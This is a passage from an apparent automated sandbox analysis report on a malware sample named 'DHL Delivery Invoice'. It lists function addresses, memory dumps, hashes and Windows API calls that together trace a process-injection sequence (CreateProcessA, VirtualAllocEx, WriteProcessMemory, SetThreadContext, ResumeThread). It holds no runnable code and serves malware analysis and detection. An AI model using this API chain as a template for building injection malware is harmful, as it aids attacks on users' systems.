                                                                                                                                  • Opcode ID: 267c81c68ea1d56cdec76928b00ad2fad4e68ceb0fbfb3e8389601d36a28393b
                                                                                                                                  • Instruction ID: d992851ee8d388dbdda6d5bfb627fb518e38f39eefd1ed8bf53a69f48d2a25bd
                                                                                                                                  • Opcode Fuzzy Hash: 267c81c68ea1d56cdec76928b00ad2fad4e68ceb0fbfb3e8389601d36a28393b
                                                                                                                                  • Instruction Fuzzy Hash: 0061E2B4E01209DFDB08CFA9D9555AEBBB2FF88310F14942AD416B7364EB349A42CF51
                                                                                                                                  Function 02AA1C98 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a04a29a34e34ffe6de84d05dfb872b1ea4de14fd4ccc5f5a7ccf6ee87b102cab
                                                                                                                                  • Instruction ID: 2f7fcb43182813f04275c7a436326f0db2e51d487558963791050050c75946da
                                                                                                                                  • Opcode Fuzzy Hash: a04a29a34e34ffe6de84d05dfb872b1ea4de14fd4ccc5f5a7ccf6ee87b102cab
                                                                                                                                  • Instruction Fuzzy Hash: 09511B74E0520A9FCB08CFAAC5506AEFBF2EF89300F24D46AD419A7355DB345A41CF64
                                                                                                                                  Function 097E92E8 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f89b30bfa018bf5f5b939484cf1cbebf9ad5a22b499174e10bd019ff356f9d03
                                                                                                                                  • Instruction ID: 52b1c724aa939428ee4ed4418eedac10ae3004a1c7ea25056d8d022fe8a85208
                                                                                                                                  • Opcode Fuzzy Hash: f89b30bfa018bf5f5b939484cf1cbebf9ad5a22b499174e10bd019ff356f9d03
                                                                                                                                  • Instruction Fuzzy Hash: AF415E72D052588FDB19CF6AC8407DEBBF7AF89300F04C1AAD509A62A5DB340A45CF51
                                                                                                                                  Function 02AA2690 Relevance: .1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2cfab2a34111b24abc4e85938ed38d455033981b23c5ce1d87e6ca0f249a09f6
                                                                                                                                  • Instruction ID: 805864b8231fb97fca23f5d88bf08bd4d9604e02c5e6b012bc018b2ba0fe0512
                                                                                                                                  • Opcode Fuzzy Hash: 2cfab2a34111b24abc4e85938ed38d455033981b23c5ce1d87e6ca0f249a09f6
                                                                                                                                  • Instruction Fuzzy Hash: 3D314771E056088FDB18CFAAD8502DEBBB2AFC9300F14C0AAD409A7264DB340A56CF50
                                                                                                                                  Function 09718368 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1086 9718368-971838d call 9717f54 1089 97183a2-97183b2 1086->1089 1090 971838f-971839f 1086->1090 1093 97183b4-97183bc 1089->1093 1094 97183bd-9718434 CreateIconFromResourceEx 1089->1094 1093->1094 1095 9718436-971843c 1094->1095 1096 971843d-971845a 1094->1096 1095->1096
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID: epU
                                                                                                                                  • API String ID: 3668623891-3012472399
                                                                                                                                  • Opcode ID: 3cdad4599a4e6b9fd044ad2277e6038cd7ac7bffff4e19ba188740a657c27aad
                                                                                                                                  • Instruction ID: c41e2fb419f8000af0a43dee59be863ff9390468d11c48efc631696afe29a338
                                                                                                                                  • Opcode Fuzzy Hash: 3cdad4599a4e6b9fd044ad2277e6038cd7ac7bffff4e19ba188740a657c27aad
                                                                                                                                  • Instruction Fuzzy Hash: FA3178729043999FCB11CFA9D844AEEBFF8EF09350F14809AF954AB221C7359950DFA1
                                                                                                                                  Function 09830CC4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09830F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 1bac596ee664dd792bf71e08c1a30cafacaf4950ae442ece1fedbd3d45b54acc
                                                                                                                                  • Instruction ID: 3d61ccb061a99e203b86d6200f2815020014a2e40979530e10b61c1c044a2406
                                                                                                                                  • Opcode Fuzzy Hash: 1bac596ee664dd792bf71e08c1a30cafacaf4950ae442ece1fedbd3d45b54acc
                                                                                                                                  • Instruction Fuzzy Hash: 84A15971D00219DFDB10CFA8C941BDEBBB2AF48314F5485A9E848E7394DB749985CF91
                                                                                                                                  Function 09830CD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09830F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 3022c1a9b3383c3cc3fb517cb5d388ed68638ccecf1a1b0972d301abb9d032b5
                                                                                                                                  • Instruction ID: fd31a5cd4b14ce814142c1a4906decf636846d22edd8b84adffd0415bfd2cf95
                                                                                                                                  • Opcode Fuzzy Hash: 3022c1a9b3383c3cc3fb517cb5d388ed68638ccecf1a1b0972d301abb9d032b5
                                                                                                                                  • Instruction Fuzzy Hash: 0F913571D00219DFDB20DFA8C941BEEBBB2AF48310F5485A9E848E7394DB749985CF91
                                                                                                                                  Function 02AAB3F5 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02AAB4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: 51a26c3b8c1a6fcef8e16ba00b5509cd4706f318778fe61b48a7bd593857435b
                                                                                                                                  • Instruction ID: dc6f128b5cae04ba3d07c13ba1758d1797c867e003c36906771e107b6bd50f5a
                                                                                                                                  • Opcode Fuzzy Hash: 51a26c3b8c1a6fcef8e16ba00b5509cd4706f318778fe61b48a7bd593857435b
                                                                                                                                  • Instruction Fuzzy Hash: 9F41F1B0D00219CEDB24CFA9C8447DDBBF1BF49304F24816AD409AB265DB756946CFA1
                                                                                                                                  Function 02AA9FBC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02AAB4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: 3384e856b09c07ced31a118841855aec75b6487eb21ce8cadbf0974b84399946
                                                                                                                                  • Instruction ID: 5ad591b2f3eed1a393ea2e44396bed1d4ec20e1e5362fb778fab7784a3d494ea
                                                                                                                                  • Opcode Fuzzy Hash: 3384e856b09c07ced31a118841855aec75b6487eb21ce8cadbf0974b84399946
                                                                                                                                  • Instruction Fuzzy Hash: FE41FFB0C0061DDBDB24CFA9C844BCEBBF5BF48308F24846AD409AB255DBB56945CFA1
                                                                                                                                  Function 09716CF9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09716D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  • Opcode ID: 6e6e01653adf71837bcd8aed243679561204c656767e53847176c3bc5c921caa
                                                                                                                                  • Instruction ID: 250cefa68857d250b5c1fad66fd9842f8d003b172ea6d7c0ea0b94d339f41dcf
                                                                                                                                  • Opcode Fuzzy Hash: 6e6e01653adf71837bcd8aed243679561204c656767e53847176c3bc5c921caa
                                                                                                                                  • Instruction Fuzzy Hash: C931C4B5D012099FDF10CF99D884ADEBBF5FB58310F14842AE859A7210D774A545CFA0
                                                                                                                                  Function 09830A40 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09830AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 0a11ad198e6c01eec9f1dc544548f71ba4d78fc892ed1935c06b0d5f3cd63149
                                                                                                                                  • Instruction ID: 975d905f97592c01987efaa3011af0ca7f0018df3584f839b0e7d38105ea5446
                                                                                                                                  • Opcode Fuzzy Hash: 0a11ad198e6c01eec9f1dc544548f71ba4d78fc892ed1935c06b0d5f3cd63149
                                                                                                                                  • Instruction Fuzzy Hash: CC2146B5900359DFCB10CFA9D981BDEBBF5FF48320F10882AE558A7251C778A945CBA0
                                                                                                                                  Function 09830A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09830AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 8b0b5b0ecbd457d1cd3108259cc40c25363800d7e600e7ebb6e04bb2ee14250a
                                                                                                                                  • Instruction ID: 30931b3b2544fe63185f44bf2d95d6a3bcd2267a7881a0f0c0684916b25b66ff
                                                                                                                                  • Opcode Fuzzy Hash: 8b0b5b0ecbd457d1cd3108259cc40c25363800d7e600e7ebb6e04bb2ee14250a
                                                                                                                                  • Instruction Fuzzy Hash: 872127B1900359DFCB10CFA9C985BDEBBF5FF48320F108429E958A7250C778A944CBA4
                                                                                                                                  Function 09716D00 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09716D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  • Opcode ID: 95446dee606c4b56c3d655e1caba994aa45a3f11f0e822ef5ba0a1e09ee0c243
                                                                                                                                  • Instruction ID: 958a9edd9a8ab82cf95d9c44ee2fcbc164937e1dbaf42e4c4548879ffcac1496
                                                                                                                                  • Opcode Fuzzy Hash: 95446dee606c4b56c3d655e1caba994aa45a3f11f0e822ef5ba0a1e09ee0c243
                                                                                                                                  • Instruction Fuzzy Hash: 9021DFB6D002099FDB10CF9AD884ADEFBF4FB48320F14842AE959A7310D774A944CFA0
                                                                                                                                  Function 09830B31 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09830BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: cd7696571c501012d835ec6b893f16750a87d1dcfcf58f647911b7f16871a122
                                                                                                                                  • Instruction ID: 8eaaf21841deed130ed00b39c90c428e68c95fb17d28880b9156d7e23f2c03f0
                                                                                                                                  • Opcode Fuzzy Hash: cd7696571c501012d835ec6b893f16750a87d1dcfcf58f647911b7f16871a122
                                                                                                                                  • Instruction Fuzzy Hash: E32134B1801349DFCB10CFA9C980BEEBBF5FF48324F10882AE559A7250C7789945CBA0
                                                                                                                                  Function 09830470 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098304F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 9db35c6cc3225dfe3c3b48e6993cb934fbf882369def35dca21c97ceffb762d1
                                                                                                                                  • Instruction ID: 7878cb228ebfe72690f9a6667967b9dfc6b43362d49cc0e87efeb04ca6405973
                                                                                                                                  • Opcode Fuzzy Hash: 9db35c6cc3225dfe3c3b48e6993cb934fbf882369def35dca21c97ceffb762d1
                                                                                                                                  • Instruction Fuzzy Hash: C22125B19002498FDB14DFAAC4857EEBFF4AF88324F14842ED459A7351CB789A44CFA4
                                                                                                                                  Function 09830B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 09830BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: 2a4b5d38f362b454a5f792c56060db5948e25d557d99a1f682f0a2a6be1e40d7
                                                                                                                                  • Instruction ID: 0ecff5b143a30d875d54f6d23e4b89965bdab0009db89e59c4ddfa5f967f38b1
                                                                                                                                  • Opcode Fuzzy Hash: 2a4b5d38f362b454a5f792c56060db5948e25d557d99a1f682f0a2a6be1e40d7
                                                                                                                                  • Instruction Fuzzy Hash: 6B2128B1800359DFCB10DFAAC840ADEBBF5FF48320F508429E559A7250C778A544CBA4
                                                                                                                                  Function 09830478 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 098304F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: ca25013028764005065b5c342f47d0abfa577fa1ac1c75fed3c1b1f1623ae319
                                                                                                                                  • Instruction ID: c1af370c9265b89c25f593063a81e35aa3c1ac75525668697ee2624d3f8f20db
                                                                                                                                  • Opcode Fuzzy Hash: ca25013028764005065b5c342f47d0abfa577fa1ac1c75fed3c1b1f1623ae319
                                                                                                                                  • Instruction Fuzzy Hash: 492107719002098FDB10DFAAC4857AEBBF4AB48324F548429D559A7241D778A944CFA4
                                                                                                                                  Function 09717F54 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09718382,?,?,?,?,?), ref: 09718427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                  • Opcode ID: 7dd5200700c5dcfde55f61654b169da48b9397dfcade8fa7dcadd0beca82b030
                                                                                                                                  • Instruction ID: 674fec9d57cec5e2f3f146c1818229425294bab8c5448937feb397586515b1a8
                                                                                                                                  • Opcode Fuzzy Hash: 7dd5200700c5dcfde55f61654b169da48b9397dfcade8fa7dcadd0beca82b030
                                                                                                                                  • Instruction Fuzzy Hash: AD1179B2800349DFCB10CF9AD844BDEBFF8EB48360F14841AE954A7210C375A950CFA5
                                                                                                                                  Function 09830981 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 098309F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 51b7d1828ca57ccea44b84fbf80b3e65fe5b8cda94c3f871f70ef194b60d0960
                                                                                                                                  • Instruction ID: 52f2ea973171a7b885c000f900a8fc463224c5c00eec456b690bd0fe533a42b4
                                                                                                                                  • Opcode Fuzzy Hash: 51b7d1828ca57ccea44b84fbf80b3e65fe5b8cda94c3f871f70ef194b60d0960
                                                                                                                                  • Instruction Fuzzy Hash: 81116772800249CFCB10DFA9D944BEEBFF5EF48324F20881AE555AB260C775A585CFA0
                                                                                                                                  Function 09830988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 098309F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 5ca617266b6f1c0d7dcd74ab1229890c2b447dddf75c42b536dffbc24013d8b2
                                                                                                                                  • Instruction ID: bb57ae23ce38ffdfbae0999361365a4327ff75a67dabe3b843e9d0fb179119ef
                                                                                                                                  • Opcode Fuzzy Hash: 5ca617266b6f1c0d7dcd74ab1229890c2b447dddf75c42b536dffbc24013d8b2
                                                                                                                                  • Instruction Fuzzy Hash: FA1123729002499FCB10DFAAC844ADFBFF5EB88320F208819E559A7250C775A954CFA0
                                                                                                                                  Function 097EFC60 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 1def0075a9de7b332ab46dacfaff6600bfae02f68a28fb8413f8fa4088193fcb
                                                                                                                                  • Instruction ID: f70c5bf86a4dc38dc677ae7afdd218a8a797526c020e7677e412c408e849eb72
                                                                                                                                  • Opcode Fuzzy Hash: 1def0075a9de7b332ab46dacfaff6600bfae02f68a28fb8413f8fa4088193fcb
                                                                                                                                  • Instruction Fuzzy Hash: 271128B19003498FCB10DFAAC54579FFBF8EB88324F24882AD459A7260CB75A544CFA4
                                                                                                                                  Function 097EFC68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ResumeThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                  • Opcode ID: 92ab181a275634c9d9842d404c5f85ababeeac22da63e611bf23875c3208506c
                                                                                                                                  • Instruction ID: e141b37f59a114ae59ce2ea7e768e5cc5147c6ef4c2e748c1b019ff9e5371a01
                                                                                                                                  • Opcode Fuzzy Hash: 92ab181a275634c9d9842d404c5f85ababeeac22da63e611bf23875c3208506c
                                                                                                                                  • Instruction Fuzzy Hash: A4113AB19003498FCB10DFAAC4457DEFBF4EB88324F248829D459A7250C775A544CF94
                                                                                                                                  Function 09834CE0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09834D45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: f05c15e848ba51aeda54855ecd91d2e58e64c851a1bdba3a95038187493d67ed
                                                                                                                                  • Instruction ID: ad19b6c25d517f2802a3a6dc7620485cbb52d31946c91ab530284dbfe306e52e
                                                                                                                                  • Opcode Fuzzy Hash: f05c15e848ba51aeda54855ecd91d2e58e64c851a1bdba3a95038187493d67ed
                                                                                                                                  • Instruction Fuzzy Hash: DC11F5B5801349DFDB10CFA9D488BDEBBF4EB48324F108459E554A7250C375A584CFA1
                                                                                                                                  Function 09834CE8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,?,?,?), ref: 09834D45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePost
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                  • Opcode ID: 327402d1c79a49af49630b4175567f9adfa6e8941c24d34b9a9b42716995f9d9
                                                                                                                                  • Instruction ID: 9175769c3a29593d045494ff076ad31b4d3428414d5d51d0150555d55572bfa8
                                                                                                                                  • Opcode Fuzzy Hash: 327402d1c79a49af49630b4175567f9adfa6e8941c24d34b9a9b42716995f9d9
                                                                                                                                  • Instruction Fuzzy Hash: 3111D0B5800349DFDB10DF9AD885BDEBBF8EB48324F10845AE558A7310C375A984CFA5
                                                                                                                                  Function 00D5D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1824354281.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_d5d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12641042776d74755a8db4e99efeb6605c3fafc108f50abe15b70fee37d0e1e8
                                                                                                                                  • Instruction ID: 009847e83df0fdcc2df5fe39b51d62d58716ea96eae3b10d9b6184a8145566b5
                                                                                                                                  • Opcode Fuzzy Hash: 12641042776d74755a8db4e99efeb6605c3fafc108f50abe15b70fee37d0e1e8
